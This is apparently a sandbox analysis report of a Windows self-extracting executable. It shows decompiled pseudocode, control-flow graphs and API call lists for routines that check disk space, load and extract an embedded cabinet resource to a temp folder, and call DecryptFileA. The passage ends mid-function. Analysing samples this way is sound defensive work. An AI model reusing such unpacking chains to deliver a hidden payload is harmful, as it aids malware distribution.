                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 324 e7597d-e759b9 GetCurrentDirectoryA SetCurrentDirectoryA 325 e759dd-e75a1b GetDiskFreeSpaceA 324->325 326 e759bb-e759d8 call e744b9 call e76285 324->326 327 e75ba1-e75bde memset call e76285 GetLastError FormatMessageA 325->327 328 e75a21-e75a4a MulDiv 325->328 345 e75c05-e75c14 call e76ce0 326->345 337 e75be3-e75bfc call e744b9 SetCurrentDirectoryA 327->337 328->327 331 e75a50-e75a6c GetVolumeInformationA 328->331 334 e75ab5-e75aca SetCurrentDirectoryA 331->334 335 e75a6e-e75ab0 memset call e76285 GetLastError FormatMessageA 331->335 339 e75acc-e75ad1 334->339 335->337 351 e75c02 337->351 343 e75ad3-e75ad8 339->343 344 e75ae2-e75ae4 339->344 343->344 347 e75ada-e75ae0 343->347 349 e75ae7-e75af8 344->349 350 e75ae6 344->350 347->339 347->344 353 e75af9-e75afb 349->353 350->349 354 e75c04 351->354 355 e75b05-e75b08 353->355 356 e75afd-e75b03 353->356 354->345 357 e75b20-e75b27 355->357 358 e75b0a-e75b1b call e744b9 355->358 356->353 356->355 360 e75b52-e75b5b 357->360 361 e75b29-e75b33 357->361 358->351 364 e75b62-e75b6d 360->364 361->360 363 e75b35-e75b50 361->363 363->364 365 e75b76-e75b7d 364->365 366 e75b6f-e75b74 364->366 368 e75b83 365->368 369 e75b7f-e75b81 365->369 367 e75b85 366->367 370 e75b87-e75b94 call e7268b 367->370 371 e75b96-e75b9f 367->371 368->367 369->367 370->354 371->354
                                                                                                                                                                                                      C-Code - Quality: 96%
                                                                                                                                                                                                      			E00E7597D(CHAR* __ecx, signed char __edx, void* __edi, char _a4) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v16;
                                                                                                                                                                                                      				char _v276;
                                                                                                                                                                                                      				char _v788;
                                                                                                                                                                                                      				long _v792;
                                                                                                                                                                                                      				long _v796;
                                                                                                                                                                                                      				long _v800;
                                                                                                                                                                                                      				signed int _v804;
                                                                                                                                                                                                      				long _v808;
                                                                                                                                                                                                      				int _v812;
                                                                                                                                                                                                      				long _v816;
                                                                                                                                                                                                      				long _v820;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t46;
                                                                                                                                                                                                      				int _t50;
                                                                                                                                                                                                      				signed int _t55;
                                                                                                                                                                                                      				void* _t66;
                                                                                                                                                                                                      				int _t69;
                                                                                                                                                                                                      				signed int _t73;
                                                                                                                                                                                                      				signed short _t78;
                                                                                                                                                                                                      				signed int _t87;
                                                                                                                                                                                                      				signed int _t101;
                                                                                                                                                                                                      				int _t102;
                                                                                                                                                                                                      				unsigned int _t103;
                                                                                                                                                                                                      				unsigned int _t105;
                                                                                                                                                                                                      				signed int _t111;
                                                                                                                                                                                                      				long _t112;
                                                                                                                                                                                                      				signed int _t116;
                                                                                                                                                                                                      				CHAR* _t118;
                                                                                                                                                                                                      				signed int _t119;
                                                                                                                                                                                                      				signed int _t120;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t114 = __edi;
                                                                                                                                                                                                      				_t46 =  *0xe78004; // 0xd47724e2
                                                                                                                                                                                                      				_v8 = _t46 ^ _t120;
                                                                                                                                                                                                      				_v804 = __edx;
                                                                                                                                                                                                      				_t118 = __ecx;
                                                                                                                                                                                                      				GetCurrentDirectoryA(0x104,  &_v276);
                                                                                                                                                                                                      				_t50 = SetCurrentDirectoryA(_t118); // executed
                                                                                                                                                                                                      				if(_t50 != 0) {
                                                                                                                                                                                                      					_push(__edi);
                                                                                                                                                                                                      					_v796 = 0;
                                                                                                                                                                                                      					_v792 = 0;
                                                                                                                                                                                                      					_v800 = 0;
                                                                                                                                                                                                      					_v808 = 0;
                                                                                                                                                                                                      					_t55 = GetDiskFreeSpaceA(0,  &_v796,  &_v792,  &_v800,  &_v808); // executed
                                                                                                                                                                                                      					__eflags = _t55;
                                                                                                                                                                                                      					if(_t55 == 0) {
                                                                                                                                                                                                      						L29:
                                                                                                                                                                                                      						memset( &_v788, 0, 0x200);
                                                                                                                                                                                                      						 *0xe79124 = E00E76285();
                                                                                                                                                                                                      						FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                                                                                                                                                                      						_t110 = 0x4b0;
                                                                                                                                                                                                      						L30:
                                                                                                                                                                                                      						__eflags = 0;
                                                                                                                                                                                                      						E00E744B9(0, _t110, _t118,  &_v788, 0x10, 0);
                                                                                                                                                                                                      						SetCurrentDirectoryA( &_v276);
                                                                                                                                                                                                      						L31:
                                                                                                                                                                                                      						_t66 = 0;
                                                                                                                                                                                                      						__eflags = 0;
                                                                                                                                                                                                      						L32:
						_pop(_t114);
						goto L33;
					}
					_t69 = _v792 * _v796;
					_v812 = _t69;
					_t116 = MulDiv(_t69, _v800, 0x400);
					__eflags = _t116;
					if(_t116 == 0) {
						goto L29;
					}
					_t73 = GetVolumeInformationA(0, 0, 0, 0,  &_v820,  &_v816, 0, 0); // executed
					__eflags = _t73;
					if(_t73 != 0) {
						SetCurrentDirectoryA( &_v276); // executed
						_t101 =  &_v16;
						_t111 = 6;
						_t119 = _t118 - _t101;
						__eflags = _t119;
						while(1) {
							_t22 = _t111 - 4; // 0x2
							__eflags = _t22;
							if(_t22 == 0) {
								break;
							}
							_t87 =  *((intOrPtr*)(_t119 + _t101));
							__eflags = _t87;
							if(_t87 == 0) {
								break;
							}
							 *_t101 = _t87;
							_t101 = _t101 + 1;
							_t111 = _t111 - 1;
							__eflags = _t111;
							if(_t111 != 0) {
								continue;
							}
							break;
						}
						__eflags = _t111;
						if(_t111 == 0) {
							_t101 = _t101 - 1;
							__eflags = _t101;
						}
						 *_t101 = 0;
						_t112 = 0x200;
						_t102 = _v812;
						_t78 = 0;
						_t118 = 8;
						while(1) {
							__eflags = _t102 - _t112;
							if(_t102 == _t112) {
								break;
							}
							_t112 = _t112 + _t112;
							_t78 = _t78 + 1;
							__eflags = _t78 - _t118;
							if(_t78 < _t118) {
								continue;
							}
							break;
						}
						__eflags = _t78 - _t118;
						if(_t78 != _t118) {
							__eflags =  *0xe79a34 & 0x00000008;
							if(( *0xe79a34 & 0x00000008) == 0) {
								L20:
								_t103 =  *0xe79a38; // 0x0
								_t110 =  *((intOrPtr*)(0xe789e0 + (_t78 & 0x0000ffff) * 4));
								L21:
								__eflags = (_v804 & 0x00000003) - 3;
								if((_v804 & 0x00000003) != 3) {
									__eflags = _v804 & 0x00000001;
									if((_v804 & 0x00000001) == 0) {
										__eflags = _t103 - _t116;
									} else {
										__eflags = _t110 - _t116;
									}
								} else {
									__eflags = _t103 + _t110 - _t116;
								}
								if(__eflags <= 0) {
									 *0xe79124 = 0;
									_t66 = 1;
								} else {
									_t40 =  &_a4; // 0xe76277
									_t66 = E00E7268B( *_t40, _t110, _t103,  &_v16);
								}
								goto L32;
							}
							__eflags = _v816 & 0x00008000;
							if((_v816 & 0x00008000) == 0) {
								goto L20;
							}
							_t105 =  *0xe79a38; // 0x0
							_t110 =  *((intOrPtr*)(0xe789e0 + (_t78 & 0x0000ffff) * 4)) +  *((intOrPtr*)(0xe789e0 + (_t78 & 0x0000ffff) * 4));
							_t103 = (_t105 >> 2) +  *0xe79a38;
							goto L21;
						}
						_t110 = 0x4c5;
						E00E744B9(0, 0x4c5, 0, 0, 0x10, 0);
						goto L31;
					}
					memset( &_v788, 0, 0x200);
					 *0xe79124 = E00E76285();
					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
					_t110 = 0x4f9;
					goto L30;
				} else {
					_t110 = 0x4bc;
					E00E744B9(0, 0x4bc, 0, 0, 0x10, 0);
					 *0xe79124 = E00E76285();
					_t66 = 0;
					L33:
					return E00E76CE0(_t66, 0, _v8 ^ _t120, _t110, _t114, _t118);
				}
			}



































                                                                                                                                                                                                      0x00e75ad1
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e75ad3
                                                                                                                                                                                                      0x00e75ad6
                                                                                                                                                                                                      0x00e75ad8
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e75ada
                                                                                                                                                                                                      0x00e75adc
                                                                                                                                                                                                      0x00e75add
                                                                                                                                                                                                      0x00e75add
                                                                                                                                                                                                      0x00e75ae0
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e75ae0
                                                                                                                                                                                                      0x00e75ae2
                                                                                                                                                                                                      0x00e75ae4
                                                                                                                                                                                                      0x00e75ae6
                                                                                                                                                                                                      0x00e75ae6
                                                                                                                                                                                                      0x00e75ae6
                                                                                                                                                                                                      0x00e75ae9
                                                                                                                                                                                                      0x00e75aeb
                                                                                                                                                                                                      0x00e75af0
                                                                                                                                                                                                      0x00e75af6
                                                                                                                                                                                                      0x00e75af8
                                                                                                                                                                                                      0x00e75af9
                                                                                                                                                                                                      0x00e75af9
                                                                                                                                                                                                      0x00e75afb
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e75afd
                                                                                                                                                                                                      0x00e75aff
                                                                                                                                                                                                      0x00e75b00
                                                                                                                                                                                                      0x00e75b03
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e75b03
                                                                                                                                                                                                      0x00e75b05
                                                                                                                                                                                                      0x00e75b08
                                                                                                                                                                                                      0x00e75b20
                                                                                                                                                                                                      0x00e75b27
                                                                                                                                                                                                      0x00e75b52
                                                                                                                                                                                                      0x00e75b52
                                                                                                                                                                                                      0x00e75b5b
                                                                                                                                                                                                      0x00e75b62
                                                                                                                                                                                                      0x00e75b6b
                                                                                                                                                                                                      0x00e75b6d
                                                                                                                                                                                                      0x00e75b76
                                                                                                                                                                                                      0x00e75b7d
                                                                                                                                                                                                      0x00e75b83
                                                                                                                                                                                                      0x00e75b7f
                                                                                                                                                                                                      0x00e75b7f
                                                                                                                                                                                                      0x00e75b7f
                                                                                                                                                                                                      0x00e75b6f
                                                                                                                                                                                                      0x00e75b72
                                                                                                                                                                                                      0x00e75b72
                                                                                                                                                                                                      0x00e75b85
                                                                                                                                                                                                      0x00e75b98
                                                                                                                                                                                                      0x00e75b9e
                                                                                                                                                                                                      0x00e75b87
                                                                                                                                                                                                      0x00e75b8c
                                                                                                                                                                                                      0x00e75b8f
                                                                                                                                                                                                      0x00e75b8f
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e75b85
                                                                                                                                                                                                      0x00e75b29
                                                                                                                                                                                                      0x00e75b33
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e75b35
                                                                                                                                                                                                      0x00e75b48
                                                                                                                                                                                                      0x00e75b4a
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e75b4a
                                                                                                                                                                                                      0x00e75b0f
                                                                                                                                                                                                      0x00e75b16
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e75b16
                                                                                                                                                                                                      0x00e75a7c
                                                                                                                                                                                                      0x00e75a8a
                                                                                                                                                                                                      0x00e75aa5
                                                                                                                                                                                                      0x00e75aab
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e759bb
                                                                                                                                                                                                      0x00e759c0
                                                                                                                                                                                                      0x00e759c7
                                                                                                                                                                                                      0x00e759d1
                                                                                                                                                                                                      0x00e759d6
                                                                                                                                                                                                      0x00e75c05
                                                                                                                                                                                                      0x00e75c14
                                                                                                                                                                                                      0x00e75c14

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 00E759A8
                                                                                                                                                                                                      • SetCurrentDirectoryA.KERNELBASE(?), ref: 00E759AF
                                                                                                                                                                                                      • GetDiskFreeSpaceA.KERNELBASE(00000000,?,?,?,?,00000001), ref: 00E75A13
                                                                                                                                                                                                      • MulDiv.KERNEL32(?,?,00000400), ref: 00E75A40
                                                                                                                                                                                                      • GetVolumeInformationA.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00E75A64
                                                                                                                                                                                                      • memset.MSVCRT ref: 00E75A7C
                                                                                                                                                                                                      • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 00E75A98
                                                                                                                                                                                                      • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 00E75AA5
                                                                                                                                                                                                      • SetCurrentDirectoryA.KERNEL32(?,?,?,00000010,00000000), ref: 00E75BFC
                                                                                                                                                                                                        • Part of subcall function 00E744B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00E74518
                                                                                                                                                                                                        • Part of subcall function 00E744B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 00E74554
                                                                                                                                                                                                        • Part of subcall function 00E76285: GetLastError.KERNEL32(00E75BBC), ref: 00E76285
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.441119458.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.441106249.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441179412.0000000000E78000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_e70000_y0EWt2mE9h.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
                                                                                                                                                                                                      • String ID: wb
                                                                                                                                                                                                      • API String ID: 4237285672-1758207633
                                                                                                                                                                                                      • Opcode ID: f4723643059707bf341da874106f7989ebf97bc9de26899e6b1bcfeb670a79ab
                                                                                                                                                                                                      • Instruction ID: fafe6e99d4763cc3484587b122920b47d53765e0da1e4036467440658e920024
                                                                                                                                                                                                      • Opcode Fuzzy Hash: f4723643059707bf341da874106f7989ebf97bc9de26899e6b1bcfeb670a79ab
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7171B3B290160CAFEB15DB60CC85FFB77ACEB88304F5495A9F50DF6141DA709E888B60
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 374 e74fe0-e7501a call e7468f FindResourceA LoadResource LockResource 377 e75161-e75163 374->377 378 e75020-e75027 374->378 379 e75057-e7505e call e74efd 378->379 380 e75029-e75051 GetDlgItem ShowWindow GetDlgItem ShowWindow 378->380 383 e75060-e75077 call e744b9 379->383 384 e7507c-e750b4 379->384 380->379 388 e75107-e7510e 383->388 389 e750b6-e750da 384->389 390 e750e8-e75104 call e744b9 384->390 392 e75110-e75117 FreeResource 388->392 393 e7511d-e7511f 388->393 398 e75106 389->398 402 e750dc 389->402 390->398 392->393 395 e75121-e75127 393->395 396 e7513a-e75141 393->396 395->396 399 e75129-e75135 call e744b9 395->399 400 e75143-e7514a 396->400 401 e7515f 396->401 398->388 399->396 400->401 404 e7514c-e75159 SendMessageA 400->404 401->377 405 e750e3-e750e6 402->405 404->401 405->390 405->398
                                                                                                                                                                                                      C-Code - Quality: 77%
                                                                                                                                                                                                      			E00E74FE0(void* __edi, void* __eflags) {
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* _t8;
                                                                                                                                                                                                      				struct HWND__* _t9;
                                                                                                                                                                                                      				int _t10;
                                                                                                                                                                                                      				void* _t12;
                                                                                                                                                                                                      				struct HWND__* _t24;
                                                                                                                                                                                                      				struct HWND__* _t27;
                                                                                                                                                                                                      				intOrPtr _t29;
                                                                                                                                                                                                      				void* _t33;
                                                                                                                                                                                                      				int _t34;
                                                                                                                                                                                                      				CHAR* _t36;
                                                                                                                                                                                                      				int _t37;
                                                                                                                                                                                                      				intOrPtr _t47;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t33 = __edi;
                                                                                                                                                                                                      				_t36 = "CABINET";
                                                                                                                                                                                                      				 *0xe79144 = E00E7468F(_t36, 0, 0);
                                                                                                                                                                                                      				_t8 = LockResource(LoadResource(0, FindResourceA(0, _t36, 0xa)));
                                                                                                                                                                                                      				 *0xe79140 = _t8;
                                                                                                                                                                                                      				if(_t8 == 0) {
                                                                                                                                                                                                      					return _t8;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t9 =  *0xe78584; // 0x0
                                                                                                                                                                                                      				if(_t9 != 0) {
                                                                                                                                                                                                      					ShowWindow(GetDlgItem(_t9, 0x842), 0);
                                                                                                                                                                                                      					ShowWindow(GetDlgItem( *0xe78584, 0x841), 5); // executed
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t10 = E00E74EFD(0, 0); // executed
                                                                                                                                                                                                      				if(_t10 != 0) {
                                                                                                                                                                                                      					__imp__#20(E00E74CA0, E00E74CC0, E00E74980, E00E74A50, E00E74AD0, E00E74B60, E00E74BC0, 1, 0xe79148, _t33);
                                                                                                                                                                                                      					_t34 = _t10;
                                                                                                                                                                                                      					if(_t34 == 0) {
                                                                                                                                                                                                      						L8:
                                                                                                                                                                                                      						_t29 =  *0xe79148; // 0x0
                                                                                                                                                                                                      						_t24 =  *0xe78584; // 0x0
                                                                                                                                                                                                      						E00E744B9(_t24, _t29 + 0x514, 0, 0, 0x10, 0);
                                                                                                                                                                                                      						_t37 = 0;
                                                                                                                                                                                                      						L9:
                                                                                                                                                                                                      						goto L10;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					__imp__#22(_t34, "*MEMCAB", 0xe71140, 0, E00E74CD0, 0, 0xe79140); // executed
                                                                                                                                                                                                      					_t37 = _t10;
                                                                                                                                                                                                      					if(_t37 == 0) {
                                                                                                                                                                                                      						goto L9;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					__imp__#23(_t34); // executed
                                                                                                                                                                                                      					if(_t10 != 0) {
                                                                                                                                                                                                      						goto L9;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					goto L8;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t27 =  *0xe78584; // 0x0
                                                                                                                                                                                                      					E00E744B9(_t27, 0x4ba, 0, 0, 0x10, 0);
                                                                                                                                                                                                      					_t37 = 0;
                                                                                                                                                                                                      					L10:
                                                                                                                                                                                                      					_t12 =  *0xe79140; // 0x0
                                                                                                                                                                                                      					if(_t12 != 0) {
                                                                                                                                                                                                      						FreeResource(_t12);
                                                                                                                                                                                                      						 *0xe79140 = 0;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					if(_t37 == 0) {
                                                                                                                                                                                                      						_t47 =  *0xe791d8; // 0x0
                                                                                                                                                                                                      						if(_t47 == 0) {
                                                                                                                                                                                                      							E00E744B9(0, 0x4f8, 0, 0, 0x10, 0);
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					if(( *0xe78a38 & 0x00000001) == 0 && ( *0xe79a34 & 0x00000001) == 0) {
                                                                                                                                                                                                      						SendMessageA( *0xe78584, 0xfa1, _t37, 0);
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					return _t37;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      			}

















                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 00E7468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00E746A0
                                                                                                                                                                                                        • Part of subcall function 00E7468F: SizeofResource.KERNEL32(00000000,00000000,?,00E72D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00E746A9
                                                                                                                                                                                                        • Part of subcall function 00E7468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00E746C3
                                                                                                                                                                                                        • Part of subcall function 00E7468F: LoadResource.KERNEL32(00000000,00000000,?,00E72D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00E746CC
                                                                                                                                                                                                        • Part of subcall function 00E7468F: LockResource.KERNEL32(00000000,?,00E72D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00E746D3
                                                                                                                                                                                                        • Part of subcall function 00E7468F: memcpy_s.MSVCRT ref: 00E746E5
                                                                                                                                                                                                        • Part of subcall function 00E7468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00E746EF
                                                                                                                                                                                                      • FindResourceA.KERNEL32(00000000,CABINET,0000000A), ref: 00E74FFE
                                                                                                                                                                                                      • LoadResource.KERNEL32(00000000,00000000), ref: 00E75006
                                                                                                                                                                                                      • LockResource.KERNEL32(00000000), ref: 00E7500D
                                                                                                                                                                                                      • GetDlgItem.USER32(00000000,00000842), ref: 00E75030
                                                                                                                                                                                                      • ShowWindow.USER32(00000000), ref: 00E75037
                                                                                                                                                                                                      • GetDlgItem.USER32(00000841,00000005), ref: 00E7504A
                                                                                                                                                                                                      • ShowWindow.USER32(00000000), ref: 00E75051
                                                                                                                                                                                                      • FreeResource.KERNEL32(00000000,00000000,00000010,00000000), ref: 00E75111
                                                                                                                                                                                                      • SendMessageA.USER32(00000FA1,00000000,00000000,00000000), ref: 00E75159
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.441119458.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.441106249.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441179412.0000000000E78000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_e70000_y0EWt2mE9h.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
                                                                                                                                                                                                      • String ID: *MEMCAB$CABINET
                                                                                                                                                                                                      • API String ID: 1305606123-2642027498
                                                                                                                                                                                                      • Opcode ID: 18780b3a3d9adefdd134998c69f8cc973b4a87bd2269f8ea0a91145dcfe8b1a3
                                                                                                                                                                                                      • Instruction ID: b8d432d1c505385a6e9a1766b91751e542087ca3b1a45bce42ce713b0562b68d
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 18780b3a3d9adefdd134998c69f8cc973b4a87bd2269f8ea0a91145dcfe8b1a3
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9E31E9F1742701BFE7109B63AD8DF6B369CAB44759F489034B90DB21E2DBB48C858651
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 82%
                                                                                                                                                                                                      			E00E72F1D(void* __ecx, int __edx) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v272;
                                                                                                                                                                                                      				_Unknown_base(*)()* _v276;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t9;
                                                                                                                                                                                                      				void* _t11;
                                                                                                                                                                                                      				struct HWND__* _t12;
                                                                                                                                                                                                      				void* _t14;
                                                                                                                                                                                                      				int _t21;
                                                                                                                                                                                                      				signed int _t22;
                                                                                                                                                                                                      				signed int _t25;
                                                                                                                                                                                                      				intOrPtr* _t26;
                                                                                                                                                                                                      				signed int _t27;
                                                                                                                                                                                                      				void* _t30;
                                                                                                                                                                                                      				_Unknown_base(*)()* _t31;
                                                                                                                                                                                                      				void* _t34;
                                                                                                                                                                                                      				struct HINSTANCE__* _t36;
                                                                                                                                                                                                      				intOrPtr _t41;
                                                                                                                                                                                                      				intOrPtr* _t44;
                                                                                                                                                                                                      				signed int _t46;
                                                                                                                                                                                                      				int _t47;
                                                                                                                                                                                                      				void* _t58;
                                                                                                                                                                                                      				void* _t59;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t43 = __edx;
                                                                                                                                                                                                      				_t9 =  *0xe78004; // 0xd47724e2
                                                                                                                                                                                                      				_v8 = _t9 ^ _t46;
                                                                                                                                                                                                      				if( *0xe78a38 != 0) {
                                                                                                                                                                                                      					L5:
                                                                                                                                                                                                      					_t11 = E00E75164(_t52);
                                                                                                                                                                                                      					_t53 = _t11;
                                                                                                                                                                                                      					if(_t11 == 0) {
                                                                                                                                                                                                      						L16:
                                                                                                                                                                                                      						_t12 = 0;
                                                                                                                                                                                                      						L17:
                                                                                                                                                                                                      						return E00E76CE0(_t12, _t36, _v8 ^ _t46, _t43, _t44, _t45);
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t14 = E00E755A0(_t53); // executed
                                                                                                                                                                                                      					if(_t14 == 0) {
                                                                                                                                                                                                      						goto L16;
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						_t45 = 0x105;
                                                                                                                                                                                                      						GetSystemDirectoryA( &_v272, 0x105);
                                                                                                                                                                                                      						_t43 = 0x105;
                                                                                                                                                                                                      						_t40 =  &_v272;
                                                                                                                                                                                                      						E00E7658A( &_v272, 0x105, "advapi32.dll");
                                                                                                                                                                                                      						_t36 = LoadLibraryA( &_v272);
                                                                                                                                                                                                      						_t44 = 0;
                                                                                                                                                                                                      						if(_t36 != 0) {
                                                                                                                                                                                                      							_t31 = GetProcAddress(_t36, "DecryptFileA");
                                                                                                                                                                                                      							_v276 = _t31;
                                                                                                                                                                                                      							if(_t31 != 0) {
                                                                                                                                                                                                      								_t45 = _t47;
                                                                                                                                                                                                      								_t40 = _t31;
                                                                                                                                                                                                      								 *0xe7a288("C:\Users\alfons\AppData\Local\Temp\IXP000.TMP\", 0); // executed
                                                                                                                                                                                                      								_v276();
                                                                                                                                                                                                      								if(_t47 != _t47) {
                                                                                                                                                                                                      									_t40 = 4;
                                                                                                                                                                                                      									asm("int 0x29");
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						FreeLibrary(_t36);
                                                                                                                                                                                                      						_t58 =  *0xe78a24 - _t44; // 0x0
                                                                                                                                                                                                      						if(_t58 != 0) {
                                                                                                                                                                                                      							L14:
                                                                                                                                                                                                      							_t21 = SetCurrentDirectoryA("C:\Users\alfons\AppData\Local\Temp\IXP000.TMP\"); // executed
                                                                                                                                                                                                      							if(_t21 != 0) {
                                                                                                                                                                                                      								__eflags =  *0xe78a2c - _t44; // 0x0
                                                                                                                                                                                                      								if(__eflags != 0) {
                                                                                                                                                                                                      									L20:
                                                                                                                                                                                                      									__eflags =  *0xe78d48 & 0x000000c0;
                                                                                                                                                                                                      									if(( *0xe78d48 & 0x000000c0) == 0) {
                                                                                                                                                                                                      										_t41 =  *0xe79a40; // 0x3, executed
                                                                                                                                                                                                      										_t26 = E00E7256D(_t41); // executed
                                                                                                                                                                                                      										_t44 = _t26;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									_t22 =  *0xe78a24; // 0x0
                                                                                                                                                                                                      									 *0xe79a44 = _t44;
                                                                                                                                                                                                      									__eflags = _t22;
                                                                                                                                                                                                      									if(_t22 != 0) {
                                                                                                                                                                                                      										L26:
                                                                                                                                                                                                      										__eflags =  *0xe78a38;
                                                                                                                                                                                                      										if( *0xe78a38 == 0) {
                                                                                                                                                                                                      											__eflags = _t22;
                                                                                                                                                                                                      											if(__eflags == 0) {
                                                                                                                                                                                                      												E00E74169(__eflags);
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										_t12 = 1;
                                                                                                                                                                                                      										goto L17;
                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                      										__eflags =  *0xe79a30 - _t22; // 0x0
                                                                                                                                                                                                      										if(__eflags != 0) {
                                                                                                                                                                                                      											goto L26;
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										_t25 = E00E73BA2(); // executed
                                                                                                                                                                                                      										__eflags = _t25;
                                                                                                                                                                                                      										if(_t25 == 0) {
                                                                                                                                                                                                      											goto L16;
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										_t22 =  *0xe78a24; // 0x0
                                                                                                                                                                                                      										goto L26;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								_t27 = E00E73B26(_t40, _t44);
                                                                                                                                                                                                      								__eflags = _t27;
                                                                                                                                                                                                      								if(_t27 == 0) {
                                                                                                                                                                                                      									goto L16;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								goto L20;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_t43 = 0x4bc;
